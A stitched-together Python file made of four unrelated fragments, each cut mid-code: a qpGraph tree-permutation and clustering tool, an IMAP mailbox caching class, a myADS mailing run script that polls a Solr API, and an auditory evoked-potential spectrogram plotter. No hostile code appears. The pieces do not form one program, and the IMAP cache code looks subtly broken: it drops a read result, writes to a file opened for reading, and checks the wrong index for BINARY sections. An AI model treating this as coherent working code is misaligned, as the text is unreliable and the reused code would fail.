children = [(child_node.tag, self.export_newick_tree(child_node)) for child_node in parent_node]
children.sort()
tag_name = '' if re.match('n[0-9]+|R', parent_node.tag) else parent_node.tag
return '(' + ','.join(node for tag, node in children) + ')%s' % tag_name
def find_graph(self):
"""
Build and test all possible trees and graphs
"""
self.log('INFO: Starting list %s' % self.nodes)
# setup a simple 2-node tree
root_node = ElemTree.Element(self.root_node)
root_tree = ElemTree.ElementTree(root_node)
ElemTree.SubElement(root_node, self.outgroup)
ElemTree.SubElement(root_node, self.nodes[0])
# recursively add all the other nodes
self.recurse_tree(root_tree, self.nodes[1], self.nodes[2:])
class NodeUnplaceable(Exception):
"""
Node cannot be placed in the graph without exceeding outlier threshold
"""
pass
def permute_qpgraph(par_file, log_file, dot_path, pdf_path, nodes, outgroup, exhaustive=False, verbose=False, nthreads=1):
"""
Find the best fitting graph for a given set of nodes, by permuting all possible graphs.
"""
# clean up the log file
if os.path.exists(log_file):
os.remove(log_file)
# instantiate the class
pq = PermuteQpgraph(par_file, log_file, dot_path, pdf_path, nodes, outgroup, exhaustive, verbose, nthreads)
# get all the permutations of possible node orders
all_nodes_perms = list(itertools.permutations(nodes, len(nodes)))
# randomise the list of starting orders
random.shuffle(all_nodes_perms)
pq.log("INFO: There are {:,} possible starting orders for the given nodes.".format(len(all_nodes_perms)))
pq.log("INFO: Performing %s search." % ("an exhaustive" if pq.exhaustive_search else "a heuristic"))
# keep looping until we find a solution, or until we've exhausted all possible starting orders
while not pq.solutions or pq.exhaustive_search:
try:
# find the best fitting graph for this starting order
pq.find_graph()
except NodeUnplaceable as error:
# log the error
pq.log(error)
try:
# try starting with a different node order
pq.nodes = list(all_nodes_perms.pop())
except IndexError:
# we've run out of node orders to try
if not pq.solutions:
pq.log("ERROR: Cannot resolve the graph from any permutation of the given nodes.")
break
pq.log("FINISHED: Found {:,} unique solution(s) from a total of {:,} unique graphs!".format(len(pq.solutions),
len(pq.tested_graphs)))
return pq.solutions
class ClusterQpgraph():
def __init__(self, graph_names, log_file, dot_path, csv_file, mtx_file, verbose, nthreads):
"""
Initialise the object attributes
"""
self.graph_names = graph_names
self.log_file = log_file
self.dot_path = dot_path
self.csv_file = csv_file
self.mtx_file = mtx_file
self.verbose = verbose
self.nthreads = nthreads
self.graphs = []
self.verbose = True
# open the file for writing
self.log_handle = open(log_file, 'a')
def log(self, message):
"""
Handle message logging to file/stdout.
"""
# send message to the log file
print >> self.log_handle, message
self.log_handle.flush()
if self.verbose:
# echo to stdout
print message
sys.stdout.flush()
@staticmethod
def parse_dot_file(path):
"""
The graph-tool library doesn't like the header attributes used by qpGraph, so we need to filter them out
"""
with open(path, 'r') as fin:
rows = fin.readlines()
# exclude lines 2-4, which contain the problematic metadata
text = "".join(rows[:1] + rows[5:])
return StringIO(text)
def calculate_distance(self, args):
"""
Calculate the similarity distance for two graphs.
See https://graph-tool.skewed.de/static/doc/topology.html#graph_tool.topology.similarity
"""
# extract the tuple of arguments
i, j = args
# calculate the distance scores between graph pairs (scores are not symmetric; i.e. A->B != B->A)
d1 = similarity(self.graphs[i], self.graphs[j], distance=True)
d2 = similarity(self.graphs[j], self.graphs[i], distance=True)
# enforce symmetry in the matrix by taking the max distance
dist = max(d1, d2)
return i, j, dist
def build_matrix(self):
"""
Build a symmetrical distance matrix for all graphs.
"""
# instantiate all the graph objects
for graph_name in self.graph_names:
dot_file = self.dot_path + '-{name}.dot'.format(name=graph_name)
graph = load_graph(self.parse_dot_file(dot_file), fmt='dot')
self.graphs.append(graph)
# how many graphs are we comparing
size = len(self.graph_names)
# initialise the distance matrix
dist_matrix = np.zeros([size, size])
# get all the i,j pairs for one diagonal half
idxs = [(i, j) for i in range(1, size) for j in range(i)]
self.log("INFO: Calculating distance matrix for {:,} graph pairs".format(len(idxs)))
if self.nthreads > 1:
# we need to buffer the results to use multi-threading
pool = mp.ProcessingPool(self.nthreads)
results = pool.map(self.calculate_distance, idxs)
else:
# compute distances without multi-threading
results = []
for i, j in idxs:
result = self.calculate_distance((i, j))
results.append(result)
# populate the distance matrix
for i, j, dist in results:
dist_matrix[i, j] = dist_matrix[j, i] = dist
# save the matrix
np.save(self.mtx_file, dist_matrix)
return dist_matrix
def get_matrix(self):
"""
Load the distance matix from file, or build it if necessary.
"""
try:
# load the distance matrix from file
dist_matrix = np.load(self.mtx_file)
self.log("INFO: Loaded distance matrix from file %s" % self.mtx_file)
except IOError:
# file doesn't exist, so build it
dist_matrix = self.build_matrix()
return dist_matrix
def cluster_qpgraph(graph_names, dot_path, log_file, pdf_file, csv_file, mtx_file, verbose=False, nthreads=1):
"""
Compare all fitting graphs and compute the number of clusters.
"""
# clean up the log file
if os.path.exists(log_file):
os.remove(log_file)
# instantiate the class
cq = ClusterQpgraph(graph_names, log_file, dot_path, csv_file, mtx_file, verbose, nthreads)
cq.log("INFO: There are {:,} graphs to compare".format(len(set(graph_names))))
# get the distance matrix
dist_matrix = cq.get_matrix()
cq.log("INFO: Calculating the hierarchical clusters (linkage matrix)")
# calculate the hierarchical clusters, using Ward's minimum variance method
# https://en.wikipedia.org/wiki/Ward%27s_method
Z = linkage(dist_matrix, method='ward')
# print a dendrogram of the clusters
pprint_dendrogram(Z, truncate_mode='lastp', p=10, leaf_rotation=90.,
leaf_font_size=12., show_contracted=True, pdf=pdf_file)
cq.log("INFO: Printed hierarchical clustering dendrogram %s" % pdf_file)
# automatically assign graphs to clusters
# https://joernhees.de/blog/2015/08/26/scipy-hierarchical-clustering-and-dendrogram-tutorial/#Inconsistency-Method
clusters = fcluster(Z, t=10, criterion='inconsistent', depth=10)
cq.log("INFO: Found %s clusters using inconsistency criterion (t=%s)" % (len(set(clusters)), 10))
with open(csv_file, 'wb') as fout:
csv_writer = csv.writer(fout)
csv_writer.writerow(['Graph', 'Cluster'])
for graph, cluster in izip(graph_names, clusters):
csv_writer.writerow([graph, cluster])
cq.log("INFO: Saved clusters to file %s" % csv_file)
if __name__ == "__main__":
from time import time
from datetime import timedelta
start = time()
if len(sys.argv) != 4:
print "Error: required params"
quit()
func = sys.argv[1]
group = sys.argv[2]
dataset = sys.argv[3]
if func == 'simulated':
# -------------------------
# -- SIMULATED TEST DATA --
# -------------------------
nodes = ['A', 'X', 'B', 'C']
outgroup = 'Out'
par_file = 'permute/simulated.par'
log_file = 'permute/simulated.log'
dot_path = | |
if self.cachedir and what.startswith('BODY[') and what[5] in '123456789T]':
try:
open(os.path.join(self.cachedir,'%d_body_%s' % (uid,what[5:-1].replace('.','_')))).read()
except OSError:
return None
elif self.cachedir and what.startswith('BINARY[') and what[5] in '123456789T]':
try:
return open(os.path.join(self.cachedir,'%d_binary_%s' % (uid,what[5:-1].replace('.','_')))).read()
except OSError:
return None
else:
k = (uid, what)
return self.cache.get(k,None)
except:
print "CACHE ERROR?"
raise
self.cache_start( True )
return None
def set_cache( self, uid, what, data ):
try:
if self.cachedir and what.startswith('BODY[') and what[5] in '123456789T]':
try:
open(os.path.join(self.cachedir,'%d_body_%s' % (uid,what[5:-1].replace('.','_')))).write(data)
except OSError:
return None
elif self.cachedir and what.startswith('BINARY[') and what[5] in '123456789T]':
try:
return open(os.path.join(self.cachedir,'%d_binary_%s' % (uid,what[5:-1].replace('.','_')))).write(data)
except OSError:
return None
else:
k = (uid, what)
self.cache[k]=data
#print "Set cache key",`k`,"to",`self.cache[k]`
except:
print "CACHE ERROR?"
raise
self.cache_start( True )
def __len__(self):
self.uidvalidity()
while self._exists is None:
self._imap.wait_ready()
self._imap.fetch()
return self._exists
def index( self, uid ):
u = self.uid( uid )
if u is None:
raise infotrope.base.connection.exception("Message %d not in mailbox." % uid)
return u
def __getitem__(self,key):
key = int(key)
return self.get_message( key )
def fetch( self, msg, what, extend=False, nofetch=False, wait=True ):
try:
self._pretend_modseq = long(time.time()*100)
sequence_start = int(msg._uid)
sequence_end = sequence_start
if extend:
sequence_start -= sequence_start % 25
sequence_end = sequence_start + 25
if sequence_start == 0:
sequence_start = 1
self.uid( sequence_start )
self.uid( sequence_end )
else:
self.uid( sequence_start )
stuff = self.real_fetch( sequence_start, sequence_end, what, nofetch )
if stuff is not None and wait:
self.fetch_wait( stuff[0], stuff[1] )
finally:
self._pretend_modseq = None
def convert_sequence_then( self, action, seqs, *args ):
class seqconverter:
def __init__( self, mbx, seqs, action, args ):
self.action = action
self.args = args
self.seqs = seqs
self.uids = []
self.mbx = mbx
def step( self, *args ):
while len( self.seqs ):
s = self.seqs.pop()
if s > len(self.mbx):
continue
if s <= 0:
continue
start = ( s / max_pull ) * max_pull
if start not in self.mbx.seqno_cache:
self.seqs.append( s )
self.mbx.seqno_prime( s, then=self.step )
return
if len(self.mbx.seqno_cache[start]) <= (s-start):
self.seqs.append( s )
self.mbx.seqno_prime( s, then=self.step )
return
self.uids.append( self.mbx.seqno_cache[start][s-start] )
self.action( self.uids, *self.args )
s = seqconverter( self, seqs, action, args )
s.step()
def prefetch( self, uidrange, then=None ):
#print "PREFETCH",`uidrange`
tag = self.real_fetch( uidrange, None, message.summary )
#print "FETCH DONE"
ndone = False
if tag and then:
infotrope.core.notify_all( self.server().env, tag[0], then )
#print "FLUSH"
self._imap.flush()
#print "FLUSH"
if not tag and then:
then( None, None, None )
return tag
def real_fetch( self, sequence_range, sequence_end, what, nofetch=False ):
rwhat = {}
mutables = []
if sequence_end is not None:
sequence_range = range(sequence_range,sequence_end+1)
for uid in sequence_range:
if self.uid( uid ) is not None or uid >= self._uid_next:
autofeed = {}
for x in what:
from_cache = False
condfetch = ''
k = (uid, x)
try:
data = self.cache.get( k )
self._imap.log("Cached: %s = %s" % (`k`,`data`))
if data is not None:
autofeed['UID'] = str(uid)
autofeed[x] = data
from_cache = True
if x=='FLAGS':
self._imap.log("Asked to fetch FLAGS. Have %s in cache." % (data))
from_cache = False
mseq = self.cache.get((uid, self._last_modseq_key),None)
self._imap.log("LASTMODSEQ is %s" % (`mseq`))
if mseq is not None:
condfetch = long(mseq)
mutables.append( uid )
if condfetch >= long(self._highest_modseq):
self._imap.log("We have newer")
from_cache = True
elif uid <= self._highwater_uid:
self._imap.log("Below high water mark")
if condfetch <= long(self._highwater_modseq):
self.cache[(uid,self._last_modseq_key)] = self._highwater_modseq
from_cache = True
elif uid <= self._highwater_uid:
self._imap.log("No modseq, but below highwater")
self.cache[(uid, self._last_modseq_key)] = self._highwater_modseq
from_cache = True
elif x.startswith('ANNOTATION'):
from_cache = False
fk = x[0:x.rindex('\0')] + '\0' + 'MODSEQ-FETCH'
nk = x[0:x.rindex('\0')] + '\0' + 'MODSEQ-CHANGED'
if fk in self.cache:
fm = long(self.cache[fk])
if fm > long(self._highest_modseq):
from_cache = True
if nk in self.cache:
nm = long(self.cache[fk])
if fm > nm:
from_cache = True
else:
condfetch = min( nm, long(self._highest_modseq) )
else:
condfetch = long(self._highest_modseq)
elif self.cachedir and x.startswith('BODY[') and x[5] in '1234567890T':
# Text or section
fname = '%d_body_' % (uid) + x[5:-1].replace('.','_')
try:
autofeed[x] = open(os.path.join(self.cachedir,fname),'rb').read()
autofeed['UID'] = str(uid)
from_cache = True
except:
pass
elif self.cachedir and x.startswith('BINARY[') and x[7] in '1234567890T':
# Text or section
fname = '%d_binary_' % (uid) + x[7:-1].replace('.','_')
try:
autofeed[x] = open(os.path.join(self.cachedir,fname),'rb').read()
autofeed['UID'] = str(uid)
from_cache = True
except:
pass
except:
import sys
t,v,tr = sys.exc_info()
print "Cache read failed: ", `t`, v
print "Tried reading",`k`
print "From:",`self.cache.__class__.__name__`,`dir(self.cache)`
raise v
self.cache_start( True )
if not from_cache:
if uid not in rwhat:
rwhat[uid] = {}
rwhat[ uid ][ ( x, condfetch ) ] = True
if len(autofeed):
try:
msg = self._messages[uid]
except:
msg = self.create_insert_message( uid )
for afkey in self._immediate_processors:
if afkey in autofeed:
aftok = autofeed[afkey]
self._immediate_processors[afkey]( afkey, aftok, len(aftok) )
msg.feed( autofeed )
if 'ENVELOPE' in autofeed:
try:
self.mid_cache[ msg.envelope().MessageID ] = uid
except:
self.mid_cache_start( True )
self.mid_cache[ msg.envelope().MessageID ] = uid
if len(rwhat)==0:
return
if nofetch:
return
return self.fetch_send_cmd( rwhat, mutables )
def fetch_send_cmd( self, rwhat, mutables ):
self._imap.register( '*', self )
tags = []
fetching = {}
for uid,rwhat2 in rwhat.items():
fpts = []
condfetch = ''
for (x,cf) in rwhat2.keys():
if cf is not None:
if condfetch!='':
if condfetch > cf:
condfetch = cf
else:
condfetch = cf
if x.startswith( 'ANNOTATION' ):
ann = x.split('\0')
x = [ ann[0], ( ann[1], ann[2] ) ]
fpts += x
else:
fpts.append( x )
if not self._condstore_real:
condfetch = ''
if fpts is not None:
fpts = tuple(fpts)
ff = (fpts,condfetch)
if ff not in fetching:
fetching[ff] = []
fetching[ff].append(uid)
for fpts,uids in fetching.items():
seqs = self._make_msg_set( uids )
if len(seqs)==0:
continue
tags.append( self.fetch_submit_cmd(','.join(seqs), mutables, fpts) )
return tags,mutables
def fetch_submit_cmd(self, set, mutables, fpts, highwater=False):
tag1, x1, x2 = None, None, None
if fpts[1]!='' and self._condstore_real:
bits = fpts[0]
if 'MODSEQ' not in fpts[0]:
bits = list(fpts[0]) + ['MODSEQ']
tag1,x1,x2 = self._imap.send( 'UID FETCH', set, bits, ['CHANGEDSINCE', fpts[1]], pipeline=True, mbox=self.path() )
else:
bits = fpts[0]
if self._condstore_real and 'MODSEQ' not in bits and 'FLAGS' in bits:
bits = list(bits) + ['MODSEQ']
tag1,x1,x2 = self._imap.send( 'UID FETCH', set, bits, pipeline=True, mbox=self.path() )
if x1 is not None:
if x1.lower()!='ok':
raise infotrope.base.connection.exception(x2)
self._waiting += 1
tag1.oncomplete( self.decr_waiters )
if not highwater and 'FLAGS' in bits:
tag1.fetched_set = set
tag1.oncomplete( self.fetch_complete )
return tag1
def decr_waiters( self, *args ):
self._waiting -= 1
def fetch_complete( self, cmd, *args ):
for u in self._imap.decompose_set(cmd.fetched_set):
self.cache[(u, self._last_modseq_key)] = self._highest_modseq
def fetch_wait( self, tags, mutables ):
if len(tags) != 0:
t,r,s = self._imap.wait( tags )
if r.lower()!='ok':
raise infotrope.base.connection.exception(s)
def _make_msg_set( self, uids, nocheck=False ):
uids.sort()
seqs = []
sseq = None
eseq = None
for u in uids:
if sseq is None:
if self.uid( u, nocheck=nocheck ) is None:
continue
sseq = u
eseq = u
elif eseq==(u-1):
eseq = u
else:
seqs.append( (sseq,eseq) )
if self.uid( u, nocheck=nocheck ) is None:
sseq = None
eseq = None
else:
sseq = u
eseq = u
if sseq is not None:
seqs.append( (sseq,eseq) )
seqs2 = []
# Phase 2: Can we reduce the byte-count by adding in non-existent UIDs?
if nocheck:
seqs2 = seqs
else:
for x in seqs:
if len(seqs2)!=0:
hit = True
for u in range( seqs2[-1][1]+1, x[0] ):
if self.uid( u, nocheck=nocheck ) is not None:
hit = False
break
if hit:
nseq = (seqs2[-1][0],x[1])
seqs2 = seqs2[0:-1] + [nseq]
continue
seqs2.append( x )
seqs = None
# Phase 3: Stringify.
seqs3 = []
for x in seqs2:
if x[0]==x[1]:
seqs3.append( str(x[0]) )
else:
seqs3.append( '%s:%s' % x )
return seqs3
def freeze( self ):
class freezer:
def __init__( self, mbx ):
self.mbx = mbx
def __del__( self ):
self.mbx.thaw()
self._freeze = True
return freezer( self )
def thaw( self ):
self._freeze = False
self.do_pending()
def do_pending(self):
tags = []
if len(self._pending)>0:
self.uidvalidity()
for (what,uids) in self._pending.items():
x = self._pending_codes[what]
set = self._make_msg_set( uids )
if len(set)>0:
t,r,s = self._imap.send( ( 'UID STORE', ','.join(set), x[0], x[1] ), pipeline=True, mbox=self.path() )
if r is None:
t.store_uids = uids
t.store_item = x[0]
t.store_thing = x[1]
tags.append( t )
self._pending = {}
if len( tags ) > 0:
try:
| |
from adsputils import setup_logging, get_date, load_config
from myadsp import tasks, utils
from myadsp.models import KeyValue
import os
import time
import argparse
import logging
import warnings
import datetime
import gzip
import random
import json
try:
from urllib.parse import quote_plus
except ImportError:
from urlparse import quote_plus
from requests.packages.urllib3 import exceptions
# ============================= INITIALIZATION ==================================== #
proj_home = os.path.realpath(os.path.dirname(__file__))
config = load_config(proj_home=proj_home)
logger = setup_logging('run.py', proj_home=proj_home,
level=config.get('LOGGING_LEVEL', 'INFO'),
attach_stdout=config.get('LOG_STDOUT', False))
warnings.simplefilter('ignore', exceptions.InsecurePlatformWarning)
app = tasks.app
# =============================== FUNCTIONS ======================================= #
def _arxiv_ingest_complete(date=None, sleep_delay=60, sleep_timeout=7200):
"""
Check if new arXiv records are in Solr - run before running myADS processing
:param date: date to check arXiv records for; default is set by days-delta from today in config (times in local time)
:param sleep_delay: number of seconds to sleep between retries
:param sleep_timeout: number of seconds to retry in total before timing out completely
:return: test bibcode or None
"""
if not date:
date = (datetime.datetime.today() - datetime.timedelta(days=config.get('ARXIV_TIMEDELTA_DAYS'))).strftime('%Y-%m-%d')
else:
date = get_date(date).strftime('%Y-%m-%d')
arxiv_file = config.get('ARXIV_UPDATE_AGENT_DIR') + '/UpdateAgent.out.' + date + '.gz'
arxiv_records = []
try:
with gzip.open(arxiv_file, 'r') as flist:
for l in flist.readlines():
# sample line: oai/arXiv.org/0706/2491 2018-06-13T01:00:29
arxiv_records.append(l.split()[0])
except IOError:
logger.warning('arXiv ingest file not found. Exiting.')
return None
arxiv_records.sort()
# get the highest numbered ID
is_new = False
while is_new is False:
last_record = arxiv_records.pop()
try:
test_new = float(last_record.split('/')[-2])
is_new = True
except ValueError:
continue
# get most recent arXiv id to test ingest later
last_id = '.'.join(last_record.split('/')[-2:])
total_delay = 0
while total_delay < sleep_timeout:
total_delay += sleep_delay
r = app.client.get('{0}?q=identifier:{1}&fl=bibcode,identifier,entry_date'.format(config.get('API_SOLR_QUERY_ENDPOINT'), last_id),
headers={'Authorization': 'Bearer ' + config.get('API_TOKEN')})
if r.status_code != 200:
time.sleep(sleep_delay)
logger.error('Error retrieving record for {0} from Solr ({1} {2}), retrying'.
format(last_id, r.status_code, r.text))
continue
numfound = r.json()['response']['numFound']
if numfound == 0:
# nothing found, try again after a sleep
time.sleep(sleep_delay)
logger.info('arXiv ingest not complete (test arXiv id: {0}). Sleeping {1}s, for a total delay of {2}s.'
.format(last_id, sleep_delay, total_delay))
continue
if numfound > 1:
# returning this as true for now, since technically something was found
logger.error('Too many records returned for id {0}'.format(last_id))
logger.info('Numfound: {0} for test id {1}. Response: {2}. URL: {3}'.format(numfound, last_id,
json.dumps(r.json()), r.url))
# check number of bibcodes from ingest
if get_date().weekday() == 0:
start_date = (get_date() - datetime.timedelta(days=3)).date()
else:
start_date = (get_date() - datetime.timedelta(days=1)).date()
beg_pubyear = (get_date() - datetime.timedelta(days=180)).year
q = app.client.get('{0}?q={1}'.format(config.get('API_SOLR_QUERY_ENDPOINT'),
quote_plus('bibstem:arxiv entdate:["{0}Z00:00" TO NOW] '
'pubdate:[{1}-00 TO *]'.format(start_date, beg_pubyear))),
headers={'Authorization': 'Bearer ' + config.get('API_TOKEN')})
logger.info('Total number of arXiv bibcodes ingested: {}'.format(q.json()['response']['numFound']))
return last_id
logger.warning('arXiv ingest did not complete within the {0}s timeout limit. Exiting.'.format(sleep_timeout))
return None
def _astro_ingest_complete(date=None, sleep_delay=60, sleep_timeout=7200):
"""
Check if new astronomy records are in Solr; run before weekly processing
:param date: check to check against astronomy bibcode list last updated date
:param sleep_delay: number of seconds to sleep between retries
:param sleep_timeout: number of seconds to retry in total before timing out completely
:return: test bibcode or None
"""
if not date:
date = (datetime.datetime.today() - datetime.timedelta(days=config.get('ASTRO_TIMEDELTA_DAYS')))
else:
date = get_date(date)
astro_file = config.get('ASTRO_INCOMING_DIR') + 'matches.input'
# make sure file is present and check modified datestamp on file - should be recent (otherwise contains old data)
try:
mod_date = datetime.datetime.fromtimestamp(os.path.getmtime(astro_file))
except OSError:
mod_date = None
# if the file is old or missing, sleep until the file is present and updated
if not mod_date or mod_date < date:
total_delay = 0
while total_delay < sleep_timeout:
total_delay += sleep_delay
time.sleep(sleep_delay)
try:
mod_date = datetime.datetime.fromtimestamp(os.path.getmtime(astro_file))
except OSError:
mod_date = None
if mod_date and mod_date > date:
break
else:
# timeout reached before astronomy update completed
logger.warning('Astronomy update did not complete within the {0}s timeout limit. Exiting.'.format(sleep_timeout))
return None
# make sure the ingest file exists and has enough bibcodes
total_delay = 0
while total_delay < sleep_timeout:
astro_records = []
try:
with open(astro_file, 'r') as flist:
for l in flist.readlines():
# sample line: 2019A&A...632A..94J K58-37447
astro_records.append(l.split()[0])
except IOError:
time.sleep(sleep_delay)
total_delay += sleep_delay
logger.warning('Error opening astronomy ingest file. Sleeping {0}s, for a total delay of {1}s'.
format(sleep_delay, total_delay))
continue
if len(astro_records) < 10:
time.sleep(sleep_delay)
total_delay += sleep_delay
logger.warning('Astronomy ingest file too small - ingest not complete. Sleeping {0}s, for a total delay of {1}s'.
format(sleep_delay, total_delay))
continue
else:
break
else:
return None
# get several randomly selected bibcodes, in case one had ingest issues
sample = random.sample(astro_records, config.get('ASTRO_SAMPLE_SIZE'))
# check that the astronomy records have made it into solr
total_delay = 0
while total_delay < sleep_timeout:
num_sampled = 0
for s in sample:
num_sampled += 1
r = app.client.get('{0}?q=identifier:{1}&fl=bibcode,identifier,entry_date'.format(config.get('API_SOLR_QUERY_ENDPOINT'), s),
headers={'Authorization': 'Bearer ' + config.get('API_TOKEN')})
# if there's a solr error, sleep then move to the next bibcode
if r.status_code != 200:
time.sleep(sleep_delay)
total_delay += sleep_delay
logger.error('Error retrieving bibcode {0} from Solr ({1} {2}), sleeping {3}s, for a total delay of {4}s'.
format(s, r.status_code, r.text, sleep_delay, total_delay))
continue
numfound = r.json()['response']['numFound']
if numfound == 0:
# nothing found - if all bibcodes in the sample were tried, sleep then start the while loop again
if num_sampled == config.get('ASTRO_SAMPLE_SIZE'):
time.sleep(sleep_delay)
total_delay += sleep_delay
logger.warning('Astronomy ingest not complete for all in sample (sample: {0}). Sleeping {1}s, for a total delay of {2}s.'
.format(sample, sleep_delay, total_delay))
# if we haven't tried the others in the same, try the rest
else:
logger.info(
'Astronomy ingest not complete (test astro bibcode: {0}). Trying the next in the sample.'
.format(s))
continue
elif numfound > 1:
# returning this as true for now, since technically something was found
logger.error('Too many records returned for bibcode {0}'.format(s))
logger.info('Numfound: {0} for test bibcode {1}. Response: {2}. URL: {3}'.format(numfound, s,
json.dumps(r.json()),
r.url))
return s
logger.warning('Astronomy ingest did not complete within the {0}s timeout limit. Exiting.'.format(sleep_timeout))
return None
def process_myads(since=None, user_ids=None, user_emails=None, test_send_to=None, admin_email=None, force=False,
frequency='daily', test_bibcode=None, **kwargs):
"""
Processes myADS mailings
:param since: check for new myADS users since this date
:param user_ids: users to process claims for, else all users - list (given as adsws IDs)
:param user_emails: users to process claims for, else all users - list (given as email addresses)
:param test_send_to: for testing; process a given user ID but send the output to this email address
:param admin_email: if provided, email is sent to this address at beginning and end of processing (does not trigger
for processing for individual users)
:param force: if True, will force processing of emails even if sent for a given user already that day
:param frequency: basestring; 'daily' or 'weekly'
:param test_bibcode: bibcode to query to test if Solr searcher has been updated
:return: no return
"""
if user_ids:
for u in user_ids:
tasks.task_process_myads({'userid': u, 'frequency': frequency, 'force': True,
'test_send_to': test_send_to, 'test_bibcode': test_bibcode})
logger.info('Done (just the supplied user IDs)')
return
if user_emails:
for u in user_emails:
r = app.client.get(config.get('API_ADSWS_USER_EMAIL') % u,
headers={'Accept': 'application/json',
'Authorization': 'Bearer {0}'.format(config.get('API_TOKEN'))}
)
if r.status_code == 200:
user_id = r.json()['id']
else:
logger.warning('Error getting user ID with email {0} from the API. Processing aborted for this user'.format(u))
continue
tasks.task_process_myads({'userid': user_id, 'frequency': frequency, 'force': True,
'test_send_to': test_send_to, 'test_bibcode': test_bibcode})
logger.info('Done (just the supplied user IDs)')
return
logging.captureWarnings(True)
if admin_email:
msg = utils.send_email(email_addr=admin_email,
payload_plain='Processing started for {}'.format(get_date()),
payload_html='Processing started for {}'.format(get_date()),
subject='myADS {0} processing has started'.format(frequency))
# if since keyword not provided, since is set to timestamp of last processing
if not since or isinstance(since, basestring) and since.strip() == "":
with app.session_scope() as session:
if frequency == 'daily':
kv = session.query(KeyValue).filter_by(key='last.process.daily').first()
else:
kv = session.query(KeyValue).filter_by(key='last.process.weekly').first()
if kv is not None:
since = kv.value
else:
since = '1971-01-01T12:00:00Z'
users_since_date = get_date(since)
logger.info('Processing {0} myADS queries since: {1}'.format(frequency, users_since_date.isoformat()))
last_process_date = get_date()
all_users = app.get_users(users_since_date.isoformat())
for user in all_users:
try:
tasks.task_process_myads.delay({'userid': user, 'frequency': frequency, 'force': force,
'test_bibcode': test_bibcode})
except: # potential backpressure (we are too fast)
time.sleep(2)
print 'Conn problem, retrying...', user
tasks.task_process_myads.delay({'userid': user, 'frequency': frequency, 'force': force,
'test_bibcode': test_bibcode})
# update last processed timestamp
with app.session_scope() as session:
if frequency == 'daily':
kv = session.query(KeyValue).filter_by(key='last.process.daily').first()
else:
kv = session.query(KeyValue).filter_by(key='last.process.weekly').first()
if kv is None:
if frequency == 'daily':
kv = KeyValue(key='last.process.daily', value=last_process_date.isoformat())
else:
kv = KeyValue(key='last.process.weekly', value=last_process_date.isoformat())
session.add(kv)
else:
kv.value = last_process_date.isoformat()
session.commit()
print 'Done submitting {0} myADS processing tasks for {1} users.'.format(frequency, | |
stimdur * 1000.0 # stim dur in ms
else:
sys.exit('not recognizable AEP software version...')
else:
fs = 20000.0
stimdur = 0.150
stimdur_ms = stimdur * 1000.0
si = file.si / 1000.0
isi = stimdur + si
stimPolarity = 2
# -------------- initialize parameters -------------------------------
# nrep = file.nRepetitions # number of repetitions
# overlap = win - gap
# window = np.hanning(np.floor(win * fs / 1000.0)) # window is a hanning window of 50 ms
# noverlap = int(np.floor(overlap * fs / 1000.0)) # overlaps noverlap samples of each segment,
# nfft = int(np.floor(win * fs / 1000.0)) # default 1000
# pad_to = int(np.floor((1.0 / freqResolution) * fs)) # convert freqResolution to number of data points [default nfft = 2^12].
# # # zero padding each segment to have nfft number of data points
# # # when nfft = fs, frequency resolution = 1 Hz
# take only 1 out of every 'interval' data points along the frequency axis, so that frequency resolution is 10 Hz on the spectrogram plot (for Python and Veusz).
freq_stepsize = 10.0 # step size on the frequency axis [default freq step size = 10 Hz]
interval = int(np.floor(freq_stepsize / freqResolution)) # make frequency interval to be 10 Hz, for Phtyon and Veusz plotting purposes
# ---- read stimulus token, first occurrence only ------------
stimToken = file.stimToken # stimulus token entered on MATLAB logbook, column 8
if dict_stimToken.get(stimToken) is not None:
stimpath, stimname = dict_stimToken[stimToken]
else:
sys.exit('not recognizable stimulus token...')
stimfs, stim = wavfile.read(hd + stimpath + stimname)
# make stimulus token to have the same sampling rate as recording fs [default = 20000]
up = 100 # set 'up' sampling at 100 (artibutrarily)
down = int(up * (stimfs / fs)) # compute 'down' sampling, to get desired new fs (relative to the old fs)
stim = signal.resample_poly(stim, up, down) # resample y to have a total of npts data points
if len(stim) > int(np.floor(fs * stimdur)):
stim = stim[0 : int(np.floor(fs * stimdur))]
# normalize stim amplitudes (time waveform)
stim = stim / np.amax(stim)
# -------------Read in stimulus and recording spectrograms ----------
for chan in range(nchans):
for polarity in range(npolarities):
# close all figures
plt.close('all')
# append chanstr and polaritystr to filepathstr and filenamestr
chanstr = '' if nchans==1 else '_chan' + str(chan)
polaritystr = polarityNames[polarity]
filepathstr = filepath + filepre + file.fileNumberString + chanstr + polaritystr
filenamestr = filepre + file.fileNumberString + chanstr + polaritystr
filename = filenamestr + '.npy'
annotationStimulus = stimToken
annotationRecording = filename + ', ' + file.experimentString
print('Reading file: ' + filepath + filename, flush=True)
# --- read in stimulus spectrogram data ---
T_ms = np.load(logfilepath + file.stimToken + '_stim_spectrogram_time_ms.npy')
F = np.load(logfilepath + file.stimToken + '_stim_spectrogram_freq.npy')
nV_S = np.load(logfilepath + file.stimToken + '_stim_spectrogram_nV.npy')
nV_S_veusz = np.load(logfilepath + file.stimToken + '_stim_spectrogram_nV_veusz.npy')
# compute (left, right, bottom, top) boundaries for imshow(), for stimulus and response
left = win/2.0 - gap/2.0
right = (stimdur_ms-win/2.0) + gap/2.0
bottom = -(freqResolution/2.0) * interval
top = F[-1] + (freqResolution/2.0)*interval
# define x tick labels
if int(stimdur*1000) == 150:
xticks = (25,50,75,100,125)
elif int(stimdur*1000) == 250:
xticks = (25,75,125,175,225)
else:
sys.exit('Unrecognizable stimulus duration')
# --- plot stimulus spectrogram ---
fig101 = plt.figure(101)
plt.imshow(nV_S_veusz, origin='lower', extent=(left, right, bottom, top), aspect='auto', cmap=dict_colorMap.get(colorMap_stimulus)) # , vmin=0, vmax=8000) # set zero origin at lower left corner, define the extent of axis boundaries (so that the x and y tick numbers will be correct), set aspect ratio to 'auto' (so that the spectrogram image will fill in the entire space), set color map to 'jet' for color and 'gray_r' for gray scale, set vmin and vmax for the lower and upper limits along the z axis (i.e., amplitude axis)
plt.title(annotationStimulus)
plt.xlabel('Time (ms)')
plt.ylabel('Frequency (Hz)')
plt.xticks(ticks=xticks)
# plt.colorbar()
if setFigureLocationFlag:
if 'Qt' in backend: # Qt (e.g., Qt5Agg)
mgr = plt.get_current_fig_manager() # get a manager for current figure
mgr.window.setGeometry(space, space, dx, dy) # set geometry of current figure (x, y, width, height) in pixels
else:
sys.exit('Unrecognizable graphical backend')
plt.show(block=False)
# --- read in response spectrogram data ---
t_ms = np.load(filepathstr + '_spectrogram_time_ms.npy')
f = np.load(filepathstr + '_spectrogram_freq.npy')
nV = np.load(filepathstr + '_spectrogram_nV.npy')
